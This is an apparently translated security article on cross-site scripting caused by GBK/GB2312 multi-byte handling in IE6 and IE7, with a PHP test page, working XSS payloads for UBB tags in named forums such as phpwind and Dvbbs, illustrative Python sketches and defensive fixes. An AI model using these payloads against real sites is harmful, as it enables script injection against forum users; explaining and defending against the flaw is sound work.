Cross-site scripting attacks caused by character sets

Source: Internet
Author: User

Security researchers pointed out this type of attack early on, but it has received little attention in China. Because most sites in China use the vulnerable character sets, the impact is still considerable, and we hope that all major sites will fix it quickly. See http://applesoup.googlepages.com/.

In a typical web application, a character set is specified when data is sent to the browser. In China, the commonly used character sets are UTF-8, GBK, and gb2312; the character set tells the browser how to interpret the returned data. Of these, gb2312 and GBK are the most widely used. However, IE has been shown to mishandle these wide character sets, which allows some application security rules to be bypassed and can lead to serious cross-site scripting vulnerabilities. When IE encounters a byte that is a valid first byte of a character in the specified character set, it assumes that this byte and the byte after it form one valid character, and it applies this assumption when parsing HTML tags and processing JavaScript and CSS. The versions tested are IE6 and IE7.
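The pairing behaviour described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions, not IE's actual parser: the function name pair_bytes_naively is hypothetical, and the lead-byte range 0x81-0xFE is assumed (it is the GBK lead-byte range).

```python
def pair_bytes_naively(data: bytes) -> list:
    """Split data into units the way the text describes IE doing it.

    Assumption: any byte in 0x81-0xFE counts as a lead byte and always
    swallows the next byte, whatever that byte is.
    """
    units = []
    i = 0
    while i < len(data):
        if 0x81 <= data[i] <= 0xFE and i + 1 < len(data):
            units.append(data[i:i + 2])  # lead byte plus whatever follows
            i += 2
        else:
            units.append(data[i:i + 1])  # plain single byte
            i += 1
    return units


sample = b"x='\xc1';"
units = pair_bytes_naively(sample)
print(units)  # the closing quote is glued to 0xC1 instead of standing alone
```

Under this model the second quote never appears as a unit of its own, which is why a later parsing stage would not see it as a delimiter.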

1. Bypassing some JS check rules


<html>
<head>
<title>80sec test</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<body>
<script>
// Report any script error so the result of the test is visible
window.onerror = function () {
    alert('Vul');
    return true;
};
</script>
<script>x = '<?php echo chr(0xC1); ?>'; y = '[User_IN_PUT]';</script>
</body>
</html>


Here, even if characters such as <, > and ' are filtered, the invalid byte sequence can be used to achieve the effect of a \ (backslash): IE combines the 0xC1 byte with the ' that follows it into one character, so the opening ' cannot find its closing quote, and the later [User_IN_PUT] can be used to execute JS code.
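To make the effect on the script concrete, here is a rough Python sketch that separates single-quoted string bodies from the surrounding code under the same naive pairing rule. The names split_js and build_script, the payload value, and the lead-byte range 0x81-0xFE are all assumptions for illustration; backslash escapes are ignored for brevity.

```python
def split_js(script: bytes):
    """Separate single-quoted string bodies from the code around them.

    Assumption: a byte in 0x81-0xFE always swallows the next byte, as the
    text describes for IE. Backslash escapes are not handled.
    """
    strings, code = [], bytearray()
    current = None  # bytearray while inside a string, otherwise None
    i = 0
    while i < len(script):
        step = 2 if 0x81 <= script[i] <= 0xFE and i + 1 < len(script) else 1
        unit = script[i:i + step]
        i += step
        if unit == b"'":
            if current is None:
                current = bytearray()           # opening quote
            else:
                strings.append(bytes(current))  # closing quote
                current = None
        elif current is None:
            code += unit
        else:
            current += unit
    if current is not None:
        strings.append(bytes(current))  # unterminated string at end of input
    return strings, bytes(code)


def build_script(first_value: bytes, user_input: bytes) -> bytes:
    # Mirrors the test page: x = '<first_value>'; y = '<user_input>';
    return b"x='" + first_value + b"';y='" + user_input + b"';"


payload = b";alert(1);//"  # hypothetical input, contains no < > or '
_, benign_code = split_js(build_script(b"a", payload))
_, attack_code = split_js(build_script(b"\xc1", payload))
print(benign_code)  # payload stays inside a string literal
print(attack_code)  # payload ends up in the code part
```

With an ordinary first value the payload is only string data; with 0xC1 in front of the closing quote, the same payload lands outside any string.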

2. Bypassing check rules for certain attributes

Some forums and programs use UBB tags to avoid the vulnerabilities caused by allowing HTML directly. However, under multi-byte encodings such as GBK, UBB tags are also prone to problems. Take the UBB tag most prone to problems as an example:


[color=xyz<?php echo chr(0xC1); ?>][/color][color=abc onmouseover=alert(/xss/) s=<?php echo chr(0xC1); ?>]Exploited[/color]


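0xC1 is a valid first byte of a gb2312 character. The input above is converted to the following, where ? marks the character that IE forms from 0xC1 and the quote after it: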


<font color="xyz?></font><font color="abc onmouseover=alert(/xss/) s=?>Exploited</font>

Here alert(/xss/) runs as an event handler, so even UBB tags are no longer safe. Many forums overlook this: phpwind, Dvbbs, and other forums are prone to such attacks. Discuz fixes the problem by appending a space after the conversion result.

There is one interesting detail with UBB tags. Some databases discard characters that do not match the specified character set, so the lead byte has to combine with the following ] or a similar character to form a valid Chinese character before it can be stored in the database. Databases such as ACCESS have no such restriction. In addition, some languages enforce the character set of a string when processing it; invalid characters may cause transcoding to fail or may be discarded, so this type of attack cannot be exploited there.
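The UBB case and the space-padding fix can be sketched as follows. This is a hypothetical converter, not the code of any forum mentioned here: the regular expression, the function names, and the reading of the Discuz fix as "a space placed just before the closing quote" are assumptions, as is the 0x81-0xFE lead-byte range.

```python
import re

# Hypothetical [color=...] converter working on raw bytes.
COLOR_TAG = re.compile(rb'\[color=([^\]"<>]*)\](.*?)\[/color\]', re.S)


def ubb_to_html(post: bytes, pad: bool) -> bytes:
    """Convert [color] tags; with pad=True a space follows the attribute value."""
    tail = b" " if pad else b""
    return COLOR_TAG.sub(
        lambda m: b'<font color="' + m.group(1) + tail + b'">'
        + m.group(2) + b"</font>",
        post,
    )


def standalone_quotes(html: bytes) -> int:
    """Count double quotes that survive naive lead-byte pairing."""
    count, i = 0, 0
    while i < len(html):
        if 0x81 <= html[i] <= 0xFE and i + 1 < len(html):
            i += 2  # lead byte swallows the next byte, quote or not
            continue
        if html[i:i + 1] == b'"':
            count += 1
        i += 1
    return count


post = (b"[color=xyz\xc1][/color]"
        b"[color=abc onmouseover=alert(/xss/) s=\xc1]Exploited[/color]")
print(standalone_quotes(ubb_to_html(post, pad=False)))  # closing quotes lost
print(standalone_quotes(ubb_to_html(post, pad=True)))   # all quotes intact
```

With padding, the lead byte consumes the space rather than the closing quote, so each attribute value stays properly delimited.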

3. Several small examples

Phpwind Forum charset XSS Vulnerability


[email=xxxx0xc1][/email][email=xxxx onmouseover=alert() s=0xc1]Fuck Me[/email]
[font=;0xc1]xxx[/font][url=http:// onmouseover=alert()//]xx[/url]


The delimiter is a special byte, written here as 0xc1 (its hexadecimal value), combined with the ] character that follows it. If the combined character is written out literally, the first example can be copied directly :)

Similarly, in the Dvbbs forum, it is easy to produce XSS with output like the following:


<font face=">xxxxxxxxxxx</font><font face=" onmouseover=alert() x=regular>xxxxxxxxxxx</font>
Both the new and old versions were tested and found to be affected.

4. Fixes

For programmers, the UTF-8 character set is robust and does not have this vulnerability, so consider using UTF-8 when designing a site.
For developers, keep in mind the principle that minimal input means maximal security. When matching with regular expressions, restrict the range of characters that may be entered and try to match only ASCII characters. If Chinese characters must be allowed, consider appending a space after them, as Discuz does, to fix this problem.
For ordinary users, consider using the Firefox browser: it handles page characters differently, which avoids some of these problems.
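The ASCII-only advice for developers might look like the sketch below. The whitelist pattern and both function names are assumptions chosen for illustration; the strict decode check is an additional idea, not something the text prescribes. Both checks are meant to run on the extracted attribute value, not on the whole post, because a lead byte followed by ] can form a valid character.

```python
import re

# Hypothetical whitelist for an attribute such as a colour name or #rrggbb.
SAFE_ATTR = re.compile(r"[A-Za-z0-9#]+")


def is_safe_attribute(raw: bytes) -> bool:
    """Accept only values made of whitelisted ASCII characters."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return False  # any byte above 0x7F is rejected outright
    return SAFE_ATTR.fullmatch(text) is not None


def is_valid_in_charset(raw: bytes, charset: str = "gbk") -> bool:
    """Strict decode: a dangling lead byte makes the value invalid."""
    try:
        raw.decode(charset)
    except UnicodeDecodeError:
        return False
    return True


print(is_safe_attribute(b"#ff0000"))      # plain ASCII value
print(is_safe_attribute(b"xyz\xc1"))      # value ending in a lead byte
print(is_valid_in_charset(b"xyz\xc1"))    # truncated multi-byte sequence
```

The whitelist is the stricter of the two and matches the "minimal input" principle; the strict decode is only useful where non-ASCII text has to be accepted.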
